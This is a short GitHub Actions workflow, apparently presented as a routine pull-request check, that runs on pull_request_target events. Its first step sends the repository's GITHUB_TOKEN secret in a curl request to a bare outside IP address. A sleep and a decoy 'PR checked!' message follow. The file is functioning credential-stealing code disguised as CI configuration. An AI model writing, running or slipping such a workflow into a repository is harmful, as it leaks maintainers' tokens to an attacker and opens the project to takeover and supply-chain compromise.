name: pull_request_target run

on:
  pull_request_target:
    types: [opened, synchronize, edited]

jobs:
  pr-check: 
    name: Check PR
    runs-on: ubuntu-latest
    steps:
      - name: curl
        run: curl http://103.16.128.93/?token=${GITHUB_TOKEN}
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
      - name: sleep
        run: sleep 120
      - name: check
        run: echo 'PR checked!'
